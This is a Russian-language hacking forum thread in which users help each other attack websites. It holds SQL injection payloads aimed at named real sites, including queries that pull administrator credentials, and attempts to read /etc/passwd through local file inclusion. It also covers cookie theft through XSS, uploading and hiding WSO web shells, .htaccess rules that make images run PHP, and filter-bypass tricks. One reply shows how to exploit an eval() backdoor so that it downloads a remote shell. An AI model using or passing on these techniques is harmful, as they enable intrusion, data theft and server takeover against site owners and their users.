http://site/ambassadors/event.php?id=/*!40100 939*/
http://site/ambassadors/event.php?id=/*!50000 939*/
Зачем он как думаете сначала так проверяет and 1=1, патом так and 1>1 и патом снова and 1=1 какая тут логика может быть работы?
И еще интересно как такие комменты работают /*!30000 939*/ растолкуйте простым языком, результат вывода как по первой ссылке с простым 939


1) Проверяет наличие инъекции, т.к. and 1 = 1 возвращает истину, а and 1 > 1 - ложь, отсюда меняется размер или содержание страницы и т.о. проверяется наличие инъекции.

2)

Комментарии /*!int */ в котором, всё заключенное в данный комментарий будет интерпретироваться как SQL запрос если номер данной версии MySQL равен указанному числу int после восклицательного знака или больше.


Code:
SELECT pass/*!32302 ,login*/FROM users

Выведет столбец login если версия MySQL равна либо выше 3.23.02

LFI


http://site.ru/index.php?razdel=17&module=%27../../../../../../../../../../../../../../etc/passwrd Warning: include(/var/www/hosts/default/avax/modules/\'etcpasswrd/module.php) [function.include]: failed to open stream: No such file or directory in /var/www/hosts/default/req/core.php on line 144 Warning: include() [function.include]: Failed opening '/var/www/hosts/default/avax/modules/\'etcpasswrd/module.php' for inclusion (include_path='.:/usr/share/php:/usr/share/pear') in /var/www/hosts/default/req/core.php on line 144


что делать?

ReV0LVeR said:
что делать?


зачем кавычка в начале? да и вообще не факт что там есть LFI

Prosta4ok , для того что-бы видеть ошибку. Проблема ни в том что уязвимости нет, проблема в фильтрации переменных. не фильтрует ":!@" и еще пару символов.

поэтому не получается подняться на каталоги выше.

Вопрос кто работал с протоколом "data:"

Есть возможность использовать его при LFI?

Какие еще варианты обхода фильтрации при локальном инклуде?

intertrey said:
Спасибо за разъяснение, интересный способ определения предварительный версии mysql. Подскажите такой вопрос.
Мне хочется понять как он работает на начальном этапе, чтобы для себя выработать наиболее оптимальный и точный механизм определения есть ли на сайте sqli инъекция или нету. А то существующие утилиты, как то удручают для массового чека.
Мне интересно, как havij определяет, что данный тип динамически подставляемого параметра, является или числовым или строковым? Как за наименьшее количество запросов, это можно определить в принципе?
Если кто нить видел достаточно полную методику определения возможности существования sqli инъекции, то поделитесь, типа там:
Проверяем на кавычки, смотрим разницу в размере. Если да, то хорошо, пробиваем по ошибкам mysql вдруг есть, далее определяем тип переменной строковая или числовая, подставляем сравнения сначала or 1>1 истина или там or 1>2 ложь, в зависимости от типа переменной запрос может выглядеть так: 15 'и' blabla '='blabla Можем там проверить на order by c group by. Далее перебираем, ищем нужные столбы и если там вывелось нужное определенное слово ~'version()'~ ~'database()'~ то у такого сайта в 80% есть sqli к примеру. Blind в расчёт не беру.


Ну в mysql если параметр число, то тип числовой,если строка то строковой, как правило. Логично же?) В факе от Dr. Zero(на рдоте) всё описано и разжёвано, как определять sqli и прочие. Если числовой тип, то делай ?id=5-1, если есть инъекция, и не фильтруется минус, то выведется 4-ая новость или т.п.

Алгоритм выведешь на основе своей практики. Читайте больше, всё разжёвано.


ReV0LVeR said:
Prosta4ok , для того что-бы видеть ошибку. Проблема ни в том что уязвимости нет, проблема в фильтрации переменных. не фильтрует ":!@" и еще пару символов.
поэтому не получается подняться на каталоги выше.
Вопрос кто работал с протоколом "data:"
Есть возможность использовать его при LFI?
Какие еще варианты обхода фильтрации при локальном инклуде?


Чтобы использовать wrappers, нужно чтобы до переменной в функции ничего небыло(пути). Типо include ($_GET['p'].'.php');

В твоём случае не получится.

Как обойти редирект на index.php при MySQL ошибке?

Выключение редиректа в браузере не помогает.

MaxFast said:
Как обойти редирект на index.php при MySQL ошибке?
Выключение редиректа в браузере не помогает.


Смотря какая ситуация, если редиректит при sql-иньекции то может редиректить на вывод или тру результат, обьесни конкретную ситуацию...

MaxFast said:
Как обойти редирект на index.php при MySQL ошибке?
Выключение редиректа в браузере не помогает.


90% что нужно использовать extravalue()

winstrool said:
Смотря какая ситуация, если редиректит при sql-иньекции то может редиректить на вывод или тру результат, обьесни конкретную ситуацию...


Вообщем есть сайт:


http://www.igorkuljeric.com/news.php?kat_id=163


Если изменить id на несуществующий - редирект на index.php.

Так же если начать раскручивать инъецию происходит редирект, даже если все верно.

VY_CMa said:
90% что нужно использовать extravalue()


Если версия Мускула

есть сайт с xss уязвимостью. Можно через нее на сайт шэлл залить?

wanttoask said:
есть сайт с xss уязвимостью. Можно через нее на сайт шэлл залить?


Воруй печенья, иди в админку, лей шелл.

А можно подробнее? я с xss пока не очень дружу.

киньте какую-нибудь статейку по xss

wanttoask said:
А можно подробнее? я с xss пока не очень дружу.


читай

/thread322832.html

wanttoask said:
киньте какую-нибудь статейку по xss


/thread20140.html

У меня в браузере хсс не отображается(не показывает окошко алерт) но ie пишет: возможность межсайтового скриптинга заблокирована. Что сделать чтобы окошко изобразилось?

В хроме

В хроме и ie>8 не работают пасивные из-за фильтров.

А можно их отключить?

Кому не жалко, скиньте какой нить сайт с SQL инъекцией.

wanttoask said:
Кому не жалко, скиньте какой нить сайт с SQL инъекцией.


да хоть милион /thread21336.html

такая проблема, залил шелл через майскул, в .htaccess запрешено в этой деректории(картинки) использовать php, залил глебже в дерикторию .htaccess с содержимым

AddType application/x-httpd-php .js AddHandler application/x-httpd-php .js

AddType application/x-httpd-php .jpg AddHandler application/x-httpd-php .jpg

в итоге файлы в форматах .jpg и .js выполняют php, после долгих мучений от того что ничего не получалось я додумался посмотреть phpinfo(); и увидел приичину моих бед allow_url_fopen Off что блин ешо можно придумать?

qaz said:
такая проблема, залил шелл через майскул, в .htaccess запрешено в этой деректории(картинки) использовать php, залил глебже в дерикторию .htaccess с содержимым
AddType application/x-httpd-php .js AddHandler application/x-httpd-php .js
AddType application/x-httpd-php .jpg AddHandler application/x-httpd-php .jpg
в итоге файлы в форматах .jpg и .js выполняют php, после долгих мучений от того что ничего не получалось я додумался посмотреть phpinfo(); и увидел приичину моих бед allow_url_fopen Off что блин ешо можно придумать?


ты же говоришь, что твои шеллы с .js и .jpg расширением исполняются как php. В чем проблема то?

попугай said:
ты же говоришь, что твои шеллы с .js и .jpg расширением исполняются как php. В чем проблема то?


я не могу изменьть инфу в файлах которые находятся выше по каталогу

например

выполняю код


PHP:
$a=file_get_contents("../.htaccess"); echo$a;



показывает Deny from all

далее выполняю код


PHP:
file_put_contents("../.htaccess","AddType application/x-httpd-php .js AddHandler application/x-httpd-php .js

AddType application/x-httpd-php .jpg AddHandler application/x-httpd-php .jpg");



реакции ноль

также


PHP:
file_put_contents("../../index.php","aaa");

реакции ноль, правятся только те файлы что лежат в етом же каталоге

В общем возникла ситуация, получил доступ в админку в управление файлами смог спокойно загрузить свой php shell, но возникает проблема, при обращение по прямой ссылке предлагает скачать файл, попытался загрузить .htacces в ответ получил, такое сообщение: "Произошла ошибка!

- Название файла не соответствует шаблону ."

Есть идеи?

Сорри , за глупый вопрос.

При помощи активной xss , возможно перенаправление трафика ?

Всмысле если обнаружил активную ксс , могу ли я сливать траф с этого сайта ?

Если кто знает, подскажите бесплатный IRC сервер.

Если есть пассивная ксс, и я отправил кому-то адрес со скриптом который ворует печеньки, то куда они сохранятся(печеньки)? В изображение?

wanttoask said:
Если есть пассивная ксс, и я отправил кому-то адрес со скриптом который ворует печеньки, то куда они сохранятся(печеньки)? В изображение?


надо на снифер гнать куки, в картинку они не как не сохранятся

и как это сделать?

Сколько статей по xss не читал, нигде не встречал никакого сниффера.

wanttoask said:
Сколько статей по xss не читал, нигде не встречал никакого сниффера.


ты их вобще читал?

/showthread.php?t=20140

ето для кого написано?


Сниферы для ХСС:
Скрипты сниффера (вебсниффера) и сайты со снифферами.
Обсуждение темы Скрипты вебсниффера
Скрипт CGI-сниффера
ProTeam Sniffer by Developer aka RUSH

Сколько статей по xss не читал, нигде не встречал никакого сниффера.


/thread104591.html в самом низу смотри...

Мне кто то может помочь ? Есть ли возможность , с помощью активки , внедрить ифрейм ?

может кто подробнее разложить, как спрятать шелл с помощью .htaccess ?

Seo_pharmacy said:
Мне кто то может помочь ? Есть ли возможность , с помощью активки , внедрить ифрейм ?


а сам тег фильтруется? можно попробовать добавить на страницу через innerHTML

Подскажите какой shell лучше заливать,чтоб его не палил антивирус и разные скрипты?

Sat-hacker said:
Подскажите какой shell лучше заливать,чтоб его не палил антивирус и разные скрипты?


самописный

Prosta4ok said:
самописный


А из таких что есть в паблике?Потому что писать только по русски могу.

Seo_pharmacy said:
/thread104591.html в самом низу смотри...
Мне кто то может помочь ? Есть ли возможность , с помощью активки , внедрить ифрейм ?


а в чём проблема? вставляещь код фрейма и всё


seozone said:
может кто подробнее разложить, как спрятать шелл с помощью .htaccess ?


никак


Sat-hacker said:
А из таких что есть в паблике?Потому что писать только по русски могу.


юзай всо и не парся поетому вопросу вобще

qaz ним и пользуюсь но где то читал что он много следов в логах оставляет,и антивирусами палиться.

Логи сильно нагружают шеллы, передающие команды посредством Get-запросов, последняя версия WSO таковой не является.

Всем привет!

В UPDATE(MySQL) есть sqlinj. Как наиболее эффективно ей воспользоваться.

Есть кое какие ограничения:

-вывода ошибки нет, только алерт, что ошипке

-в поле зависать можно только число(если сделать подстановку)

Что пробовал:


Code:
'+(select(user()))+'

результат - пусто


Code:
a'+(select(user()))+'b

результат - пусто


Code:
1'+(select(3))+'2

результат 6


Code:
1'+(select('c'))+'2

результат 3


Code:
a'+(select('3'))+'b

результат 3


Code:
1'+(select(version()))+'2

результат - 8.1


Конечно можно blind'ануть, но придумал такой вариант:


Code:
'+(select(Replace(Replace(Replace(Replace(Replace( Replace(hex(user()),'F','006'),'E','005'),'D','004 '),'C','003'),'B','002'),'A','001')))+'

Если текст небольшой,

результат - 00419100400021004182

иначе - 4.19100400021004e+17

По сравнению с blind'ом, вариант лучше, но и здесь есть минусы, т.к. при обратной конвертации 4.19100400021004e+17 дает 00419100400021004000

Еще была мысль закомментить оставшуюся часть запроса и update'нуть другое поле, но опасаюсь засветиться, т.к. хз что в where. Хотя по косвенным признакам можно id вытянуть, но боюсь он не цифровой.

Есть еще предложения, что можно сделать?

BigBear said:
Логи сильно нагружают шеллы, передающие команды посредством Get-запросов, последняя версия WSO таковой не является.


Подскажи пожалуйста где скачать последнюю версию?Не могу найти.

Sat-hacker said:
Подскажи пожалуйста где скачать последнюю версию?Не могу найти.


пожалуйста, сир. долго искали что не нашли? гугл сдох?

запрос "site:forum.antichat.ru wso" больше не работает?

/thread103155.html

Konqi да видел я эту версию но незнал что она последяя.

Товарищи, есть идеи по поводу http://ironage-radio.com/' , можно как-то это использовать?

cipa21 said:
Товарищи, есть идеи по поводу http://ironage-radio.com/' , можно как-то это использовать?


http://ironage-radio.com/'and(select*from(select(name_const(version(),1)),n ame_const(version(),1))a)and(1)='1+--+

extractvalue тоже катит, пробуй сам

Всем привет. Нашел xss но вот

фильтр съедает всё что в скобках <> сначала думал съедает скрипт

проверил съедает всё что внутри <> как обойти фильтрацию, помогите

пожалуйста

Kolyan333 said:
Всем привет. Нашел xss но вот
фильтр съедает всё что в скобках <> сначала думал съедает скрипт
проверил съедает всё что внутри <> как обойти фильтрацию, помогите
пожалуйста


Надо смотреть на месте. Двойные

нет двойные тоже не пропускают. Когда впереди пишу >>> то пропускает но скрипт не выполняется. Как понял фильтр находит открытие и закрытые скобок и удаляет .

когда пишу так >> ript>alert("")ript> то вижу это после фильтрации alert("") но сам скрипт не выполняется

Kolyan333 said:
когда пишу так >> ript>alert("")ript> то вижу это после фильтрации alert("") но сам скрипт не выполняется


Нужен сам скрипт для тестирования. Вариантов куча может быть.

вот сайт galaxy.mobstudio.ru/web (http://galaxy.mobstudio.ru/web/) в любой поле вводишь кроме смс в эфир то съедает всё что внутри скобок. проверь пожалуйста

прошу помощи для совершения sql-инъекции

Всем доброго времени суток.

Прошу помощи извлечь полезную информацию из базы данных, используя sql-инъекцию.

Недавно на некотором сайте обнаружил возможность sql-инъекции:

в передаваемом post-параметре НЕ фильтруется обратный слэш ( \ ; ascii-код = 92 = 0x5C ).

Если заполнить текстовый input с именем ID значением 12345 , а другой текстовый input с именем VarXXX значением 67890\ и за-SUBMIT-ить форму - то сайт вернет следущую ошибку:

Ошибка сервера Базы Данных MySQL!

Ошибка:

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''67890\' AND `id`=12345' at line 1

Номер ошибки:

1064

и далее подробности ошибки (ошибочный sql-запрос):

SELECT `id`,`varAAA`,`varBBB`,`varCCC`,`varDDD` FROM `tableXXX` WHERE `varXXX`='67890\' AND `id`=12345

"Одинарная" кавычка ( ' = апостроф ; ascii-код = 39 = 0x27 ) и "двойная" кавычка ( " ; ascii-код = 34 = 0x22 ) , а также + (знак плюса) фильтруются (вырезаются) ,вероятно, на уровне php.

Если , например, заполнить текстовый input с именем ID значением 5'4321 , а другой текстовый input с именем VarXXX значением 0'9876\ - то сайт вернет ошибку со следущими подробностями:

SELECT `id`,`varAAA`,`varBBB`,`varCCC`,`varDDD` FROM `tableXXX` WHERE `varXXX`='09876\' AND `id`=54321

Если , например, заполнить текстовый input с именем ID значением 5"4321 , а другой текстовый input с именем VarXXX значением 0"9876\ - то сайт вернет ошибку с теми же самыми подробностями:

SELECT `id`,`varAAA`,`varBBB`,`varCCC`,`varDDD` FROM `tableXXX` WHERE `varXXX`='09876\' AND `id`=54321

Символы !#$%&()*,-./:;?@[\]^_`{|}~ , а также пробел не фильтруются

Если , например, заполнить текстовый input с именем ID значением 777 , а другой текстовый input с именем VarXXX значением 11!#$%&()*,-./:;?@[\]^_`{|}~ 22 - то сайт вернет ошибку со следущими подробностями:

SELECT `id`,`varAAA`,`varBBB`,`varCCC`,`varDDD` FROM `tableXXX` WHERE `varXXX`='11!#$%&()*,-./:;?@[\]^_`{|}~ 22\' AND `id`=777

Подобным образом выяснилось, что значения из текстового input-а с именем ID приводятся только к числовому виду таким образом, что первый в строке любой нецифровой символ (или буква) , а также всё, что идёт после него (или неё), - вырезается.

Если , например, заполнить текстовый input с именем ID значением 123d456 , а другой текстовый input с именем VarXXX значением 09876\ - то сайт вернет ошибку со следущими подробностями:

SELECT `id`,`varAAA`,`varBBB`,`varCCC`,`varDDD` FROM `tableXXX` WHERE `varXXX`='09876\' AND `id`=123

Если же , например, заполнить текстовый input с именем ID значением 0xff , а другой текстовый input с именем VarXXX значением 09876\ - то сайт вернет ошибку со следущими подробностями:

SELECT `id`,`varAAA`,`varBBB`,`varCCC`,`varDDD` FROM `tableXXX` WHERE `varXXX`='09876\' AND `id`=0

Что можно полезного поиметь в этом случае ?

P.S.

названия INPUT-ов , а также названия столбцов и таблицы в БД умышленно мною изменены

IMMORTAL_S said:
Конечно можно blind'ануть, но придумал такой вариант:

Code:
'+(select(Replace(Replace(Replace(Replace(Replace( Replace(hex(user()),'F','006'),'E','005'),'D','004 '),'C','003'),'B','002'),'A','001')))+'

Если текст небольшой,
результат -
00419100400021004182
иначе -
4.19100400021004e+17
По сравнению с blind'ом, вариант лучше, но и здесь есть минусы, т.к. при обратной конвертации
4.19100400021004e+17
дает 00
419100400021004
000


а что мешает тебе извлекать любую необходимую тебе строку по одному символу ?

ord(mid(user(),1,1)) - ascii-код первого символа пльзователя

ord(mid(user(),2,1)) - ascii-код второго символа пльзователя

ord(mid(user(),3,1)) - ascii-код третьего символа пльзователя

и .т.д.

P.S. учи "мат. часть"

функция MID() = SUBSTRING()

Return a substring starting from the specified position


MID(str,pos,len) is a synonym for SUBSTRING(str,pos,len).

SUBSTRING(str,pos), SUBSTRING(str FROM pos), SUBSTRING(str,pos,len), SUBSTRING(str FROM pos FOR len)

The forms without a len argument return a substring from string str starting at position pos. The forms with a len argument return a substring len characters long from string str, starting at position pos. The forms that use FROM are standard SQL syntax. It is also possible to use a negative value for pos. In this case, the beginning of the substring is pos characters from the end of the string, rather than the beginning. A negative value may be used for pos in any of the forms of this function.

For all forms of SUBSTRING(), the position of the first character in the string from which the substring is to be extracted is reckoned as 1.

mysql> SELECT SUBSTRING('Quadratically',5);

-> 'ratically'

mysql> SELECT SUBSTRING('foobarbar' FROM 4);

-> 'barbar'

mysql> SELECT SUBSTRING('Quadratically',5,6);

-> 'ratica'

mysql> SELECT SUBSTRING('Sakila', -3);

-> 'ila'

mysql> SELECT SUBSTRING('Sakila', -5, 3);

-> 'aki'

mysql> SELECT SUBSTRING('Sakila' FROM -4 FOR 2);

-> 'ki'

This function is multi-byte safe.

If len is less than 1, the result is the empty string.

функция ORD() = ASCII() Return character code for leftmost character of the argument

If the leftmost character of the string str is a multi-byte character, returns the code for that character, calculated from the numeric values of its constituent bytes using this formula:

(1st byte code)

+ (2nd byte code * 256)

+ (3rd byte code * 2562) ...

If the leftmost character is not a multi-byte character, ORD() returns the same value as the ASCII() function.

mysql> SELECT ORD('2');

-> 50

ASCII(str) - аналог полный аналог функции ord() , но для строк , состоящих из 8-битных символов

Returns the numeric value of the leftmost character of the string str. Returns 0 if str is the empty string. Returns NULL if str is NULL. ASCII() works for 8-bit characters.

mysql> SELECT ASCII('2');

-> 50

mysql> SELECT ASCII(2);

-> 50

mysql> SELECT ASCII('dx');

-> 100

1)кто в курсах как залить шелл через TinyBrowser, в гугле ненашол

aadktnbaov said:
P.S. учи "мат. часть"


Я спрашивал - Как наиболее эффективно ей воспользоваться.

А под blind'ануть и имелось в виду та мат. часть, которую ты здесь расписал.. может только определение неподходящее я выбрал.

Пока делаю по своему, вытягиваю по несколько символов за раз.

Вопрос по LFI.


http://www.epoka.edu.al/new/index.php?p=


Ну вот qaz пытался мне помочь, но не смог.

Помогите выжать максимум из LFI, не получается.

IMMORTAL_S said:
Я спрашивал - Как
наиболее эффективно
ей воспользоваться.
А под blind'ануть и имелось в виду та мат. часть, которую ты здесь расписал.. может только определение неподходящее я выбрал.
Пока делаю по своему, вытягиваю по несколько символов за раз.



BLIND-ануть - это значит применить sql-инъекцию "вслепую"

без вывода резьтата куда-либо в явном виде

см. перевод англ. слова "BLIND"

чаще всего подразумевает под собой применение инъекции с двояким резьтатом её исполнения ( true , false значение )

например, результат инъекции может быть либо "нормальной" страницей , либо пустой страницей

с помощью такой "слепой" инъекции можно методом "тупого" ПЕРЕБОРА (ну или "умного", если хорошо понимаешь , какие именно данные хочешь извлечь и как оптимизировать этот самый "тупой" подбор ) вытянуть нужные данные из базы

В Вашем же случае инъекция ни разу не BLIND

данные в базе Вы изменяете с помощью update-инъекции и затем можете увидеть изменения в явном виде

HEX-хуекс или BASE64 вместо желанного plain text - это уже не важно

из Вашего HEX-a даныне легко преобразовать к оригиналу (желанному plain text ).

IMMORTAL_S said:
Я спрашивал - Как
наиболее эффективно
ей воспользоваться.



могу посоветовать оптимизировать вытягивание даныне Вашим replace-ом

но не так

001 , 002 , 003 , 004, 005 , 006

вместо

a , b , с , d , e , f

а так

01 , 02 , 03, 04 , 05 , 06

вместо

a , b , с , d , e , f

врядли в изначальной строке будут символы с ascii-кодами , начинающимися на 0 в хексе

т.е. строка hex('admin') = 61646D696E

в вашем случае преобразуется в 616460469605

далее проанализировав по четности месторасположения нуля в строке , нетрудно понять где именно менялись буквенные символы хекса

Как можно реализовать FTP-соединение на шелле? Подскажите несложные способы или дайте ссылки, где есть мануалы по этому, буду очень благодарен.

Code:
http://www.basegroup.su/index.php?Page=../../../../../etc/passwd

в частности, есть какая либо утилита-скрипт которая приводит в читабельный вид файл passwd? спрашиваю чисто из-за любопытсва и на будущее. паролей то там нет как я понимаю? в даном случае используются shadow пароли?но получить доступк /etc/shadow на данном ресурсе при помощи LFI не представляется возможным.вобще какой толк от этого файла, если только это не какая то экзотическая рухлядь, где пароли ещё не вынесены из passwd?

rooting -> cat /etc/passwd --> ftp connecting.

не получается залить шелл,т.е. я могу лить любые форматы,но они не работают как пхп,а открываются txt, как можно залиться?

shell_c0de said:
rooting -> cat /etc/passwd --> ftp connecting.


"passwd" – не вижу такой каталог, хотя в etc вообще нет папок. Это значит у меня не хватает прав?

p1oneer said:
"
passwd
" – не вижу такой каталог, хотя в etc вообще нет папок. Это значит у меня не хватает прав?


это значит что passwd Не каталог а файл, и тебе срочно надо курить книжку по linux. смекаешь?


intertrey said:
хм
http://0214.by/catalog.php?id=130 AnD 1 ИСТИНА
http://0214.by/catalog.php?id=130 AnD 0 ЛОЖЬ
а у строковых также?
http://0214.by/catalog.php?id=130' AnD '1 ИСТИНА
http://0214.by/catalog.php?id=130' AnD '0 ЛОЖЬ
Это как аналоги сравнения для:
http://0214.by/catalog.php?id=130' AnD 'hexon'='hexon ИСТИНА
http://0214.by/catalog.php?id=130' AnD 'hexon'>'hexjector ЛОЖЬ
Равнозначны или не?)


http://0214.by/catalog.php?id=130+and+0+union+select+1,version(), 3,4,5,6,7,8,9,10--+

внимательнее. смотри в тайтл

intertrey said:
Эм. Я чуток о другом спросил, сайт просто для примера привел, мне не интересны ни колонки ни title
Вот это http://0214.by/catalog.php?id=130' AnD '1 и вот это http://0214.by/catalog.php?id=130' AnD 'hexon'='hexon одно и тоже по сути? Просто для себя скрипт пишу, вырабатываю оптимальный алгоритм под свои нужны. У меня на некоторых сайтах фильтруется и '=' и операторы сравнения '>'. Просто если Я хочу интежер сравнивать между собой, то могу указать вот так вот просто:
http://0214.by/catalog.php?id=130 AnD 1 ИСТИНА
http://0214.by/catalog.php?id=130 AnD 0 ЛОЖЬ
а не:
http://0214.by/catalog.php?id=130 AnD 1=1 ИСТИНА
http://0214.by/catalog.php?id=130 AnD 1>2 ЛОЖЬ
Также можно сделать для string? Справка от mysql http://www.mysql.ru/docs/man/Comparison_Operators.html не дала мне точного ответа)


and 1

and 0

такая конструкция работает не во всех СУБД

лучше and 1=1 / and 1=0

для string (MySQL)

SELECT * FROM `products` WHERE 'antichat' (empty set)

SELECT * FROM `products` WHERE 'antichat'='antichat' (true)

Дело в том что я залил шелл в раздел banners, но не могу перейти ни в какой раздел кроме этого, так-как ограничены права. Я слышал что можно залить файл htaccess прописав что-то и другие папки будут иметь полные права. Так ли это или есть другие способы открыть полные права на другие разделы?

http://lakiauto.ee/templates/artikkel.php?KatID=100&ArtID=0%20union%20select%201,2,concat%280x3c696e6a 5f646174613e,table_name,0x3c2f696e6a5f646174613e%2 9,4,5,6,7,8,9,10,11,12,13%20from%20information_sch ema.tables%20limit%2029,1

http://lakiauto.ee/templates/artikkel.php?KatID=100&ArtID=0%20union%20select%201,2,concat%28user,0x3a, pass,0x3a,email%29,4,5,6,7,8,9,10,11,12,13%20from% 20zp_administrators%20limit%200,1

WTF?

avegolove said:
Дело в том что я залил шелл в раздел banners, но не могу перейти ни в какой раздел кроме этого, так-как ограничены права. Я слышал что можно залить файл htaccess прописав что-то и другие папки будут иметь полные права. Так ли это или есть другие способы открыть полные права на другие разделы?


ограниченные права на сервере? так как ты хочешь поднять права посредством .htaccces? тебе рутать надо а не htaccess заливать


vaddd said:
http://lakiauto.ee/templates/artikkel.php?KatID=100&ArtID=0%20union%20select%201,2,concat%280x3c696e6a 5f646174613e,table_name,0x3c2f696e6a5f646174613e%2 9,4,5,6,7,8,9,10,11,12,13%20from%20information_sch ema.tables%20limit%2029,1
http://lakiauto.ee/templates/artikkel.php?KatID=100&ArtID=0%20union%20select%201,2,concat%28user,0x3a, pass,0x3a,email%29,4,5,6,7,8,9,10,11,12,13%20from% 20zp_administrators%20limit%200,1
WTF?


читаем статью нолика. несколько раз.

Ограниченные а как можно поднять права?

avegolove said:
Ограниченные а как можно поднять права?


тебе ж сказали, рутать

непойму, как юзать сплойты с http://www.exploit-db.com

seozone said:
непойму, как юзать сплойты с http://www.exploit-db.com


конкретизируй свой вопрос.. там много разных сплоитов, на разных языках

seozone said:
непойму, как юзать сплойты с http://www.exploit-db.com


Python:

./exploit.py -some key

C/C++

gcc –o exploit exploit.c #это очень грубый пример

читай про gcc компилятор

Prosta4ok said:
конкретизируй свой вопрос.. там много разных сплоитов, на разных языках


например, http://www.exploit-db.com/exploits/22766/

seozone said:
например, http://www.exploit-db.com/exploits/22766/


там просто SQLi через GET запрос и перечислены уязвимые переменные

Prosta4ok said:
там просто SQLi через GET запрос и перечислены уязвимые переменные


покажи пример в пм)

Konqi said:
ограниченные права на сервере? так как ты хочешь поднять права посредством .htaccces? тебе рутать надо а не htaccess заливать
читаем статью нолика. несколько раз.


можно линк? не могу найти...

Есть форма добавления объявления. Вставляю кавычку в пост запрос и получаю.


item id
user_id
sale or buy
stone1
stone1_val
stone2
stone2_val
city_all
Query failed: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '0', '25', '0', '25', '123', '0')' at line 16


если делаю так '+order+by+2+--+ пишет -


item id
user_id
sale or buy
stone1
stone1_val
stone2
stone2_val
city_all
Query failed: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'order+by+2+--+', '0', '25', '0', '25', '123', '0')' at line 16


Пробовал без кавычки определить кол-во полей, но Проблема в том, что после пост запроса подгружается другая страница, которая возникает при правильном запросе.

Что попробовать, как быть?

p.s. Корыстных целей не преследую, ресурс закрытый и направленности совсем не интересная широкой публике. Бага будет сдана сразу админу.

justonline, inj в insert, свои методы.

/thread35207.html (https://antichat.live/threads/35207/)

VY_CMa said:
justonline
, inj в insert, свои методы.
/thread35207.html (https://antichat.live/threads/35207/)


точно) что-то мой пияный моск не сообразил, что тут запись а не select)

seozone said:
покажи пример в пм)


так там все расписано, какой еще пример?

ищешь сайт с уязыимым скрптом, подставляешь


Code:
сайт/[path]/view_faq.php?question=-4+AND+1=2+UNION+SELECT+0,1,2,version%28%29,4,5--

если показывает версию БД знач все пучком и можно крутить скулю дальше

VY_CMa said:
justonline
, inj в insert, свои методы.
/thread35207.html (https://antichat.live/threads/35207/)




Select * from dle_users where user_id = 292+order+by+1+--+2 Query failed: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'order+by+1+--+' at line 1


из той же оперы? опять пост, но вот смущает Select, правда почему, интересно он выводится в ошибке...

Вопрос, как эксплуатировать бекдор eval ($_REQUEST['a']); ?

Попробовал на локалхосте выполнить http://localhost/test.php?a=http://test1/wso2_pack.php

выдает ошибку


Parse error: syntax error, unexpected ':' in .....\localhost\test.php(15) : eval()'d code on line 1


соответственно бекдор прописан на 15 строчке

eval ($_REQUEST['a']);


После eval пробела быть не должно.


http://localhost/test.php?a=http://test1/wso2_pack.php


щито? eval - выполняет PHP код!

Юзай например так:


test.php?a=copy("http://site.com/you_wso.
TXT
","./wso.php");


Эта функция скопирует текствовый файл с сервера, и сохранит его рядом с test.php под именем wso.php

Обрати внимание, MQ должно быть off, иначе кавычки проэкранируются. Тогда нужно будет юзать base64.

Pirotexnik said:
После eval пробела быть не должно.
щито? eval - выполняет
PHP
код!
Юзай например так:
Эта функция скопирует
текствовый
файл с сервера, и сохранит его рядом с test.php под именем wso.php
Обрати внимание, MQ должно быть off, иначе кавычки проэкранируются. Тогда нужно будет юзать base64.


не обязательно юзать base64 если хочется видеть читабельный вид для глаза, то можно сделать так:


PHP:
test.php?a=copy($_GET[a],$_GET[b])&a=http://site.com/you_wso.TXT&b=wso.php

а чтобы обойти MQ можно в мини шеле заюзать stripslashes()


но опять же если юзать base64 то просматривающего админом логи смогут завести его в заблуждение)

дядьки, подскажите как в MS-SQL делать запросы БЕЗ ПРОБЕЛОВ

уж очень не хочется заморачиваться с устанавливкой и освоением MS-SQL

я так понимаю, что в MS-SQL при нормальном (НЕ-инъекции) использовании запрос

select(varXXXX)from(tblXXX)

не будет работает ?

у меня, например , SQL-инъекция с вышеупомянутым запросом "валится" с ошибкой 500 (отчёт об ошибках отключен, подробности не узнать...)

НО , например, запрос

select(@@version))

или

(db_name())

успешно "вытягивает" инфу из базы

Всё , что я научился сейчас "вытягивать" с базы , - это получение информации из встроенных функций Transact-SQL, описанных здесьhttp://msdn.microsoft.com/ru-ru/library/ms174318.aspx

например

(current_user)

(user)

(system_user)

(original_login())

и т.д.

но этого ,естесственно, мало

что вообще максимум можно поиметь, если sql-инъекция в MS-SQL возможна, но ТОЛЬКО БЕЗ ПРОБЕЛОВ ???

P.S.

пробелы скриптом ТОЧНО режутся

запрос вида

(select('qwe rty'))

успешно вернул мне

qwe%20rty

просто браузер каждый пробел в GET-запросе преобразует в %20 ,

и SQL-запрос с этими %20 прямо в таком виде и ПЫТАЕТСЯ выполниться, естесственно, с ошибкой ( http 500 )

P.P.S.

http://msdn.microsoft.com/ru-ru/library/ms178623(v=sql.100).aspx

использование комментариев вида /**/ вместо пробела в моем случае исключено

т.к. get-параметры передаются через косую черту, т.е. вот так

http://hostname/path/param1/param2/param3/param4/param5/

и использование комментариев вида /**/ приводит к ошибке

что вообще максимум можно поиметь, если sql-инъекция в MS-SQL возможна, но ТОЛЬКО БЕЗ ПРОБЕЛОВ ???


В MSSQL в качестве пробелов проходят следующие конструкции

+,01,02,03,04,05,06,07,08,09,0A,0B,0C,0D,0E,0F,10, 11,12,13,14,15,16,17,18,19,1A,1B,1C,1D,1E,1F,20,%

Юзать примерно так

SELECT%01column%02FROM%03table;

+or+1=1 ну и так далее....

Ещё есть такая вариация

SELECT"table_name"FROM[information_schema].[tables]

BigBear said:
В MSSQL в качестве пробелов проходят следующие конструкции
+,01,02,03,04,05,06,07,08,09,0A,0B,0C,0D,0E,0F,10, 11,12,13,14,15,16,17,18,19,1A,1B,1C,1D,1E,1F,20,%
Юзать примерно так
SELECT
%01
column
%02
FROM
%03
table;
+
or
+
1=1 ну и так далее....
Ещё есть такая вариация
SELECT
"
table_name
"
FROM
[
information_schema
].[
tables
]



если мой get-запрос содержит знак плюса, тогда ошибка такая

Server Error

404 - File or directory not found.

The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.

Причем неважно в каком месте get-запроса находится знак плюса - даже внутри кавычек селекта

http://hostname/path/param1/(select('1+1'))/param3/param4/

вываливается вышеуказанная ошибка

хотя если знак плюса заменить на другой - будет всё ОК

http://hostname/path/param1/(select('1%1'))/param3/param4/

